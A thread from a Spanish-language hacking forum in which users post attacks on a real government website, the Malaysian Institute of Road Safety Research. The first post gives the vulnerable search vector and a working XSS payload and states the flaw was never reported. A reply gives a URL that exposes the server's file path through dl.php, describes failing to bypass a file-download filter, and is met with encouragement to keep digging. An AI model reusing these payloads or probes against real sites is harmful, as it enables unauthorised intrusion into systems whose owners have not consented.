Imprimir

Páginas: [1] Ir Abajo

« anterior próximo »

[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

2 Respuestas
2493 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Drok3r

Underc0der
Mensajes: 51
Actividad:
0%
Reputación 1
Twitter: @drok3r

[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

en: Julio 26, 2018, 10:52:33 pm

URL: https://www.miros.gov.my
Vector: search
Payload: x'"><script>alert(/Drok3r/)</script>
Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
Reportado: NO

En línea

Nobody

Underc0der
Mensajes: 197
Actividad:
0%
Country:
Reputación 4
Security as art.
Twitter: @n0bodysec

Re:[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

en: Agosto 09, 2018, 03:50:39 am

¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

En línea

Drok3r

Underc0der
Mensajes: 51
Actividad:
0%
Reputación 1
Twitter: @drok3r

Re:[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

en: Agosto 11, 2018, 08:46:56 pm

Cita de: Nobody en Agosto 09, 2018, 03:50:39 am

¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Hola...

Muy interesante... igual con un poco de tiempo de logra sacar algo

En línea

Imprimir

Páginas: [1] Ir Arriba

« anterior próximo »

Underc0de | Hacking y Seguridad Informática

Copyright 2011 - 2029 ©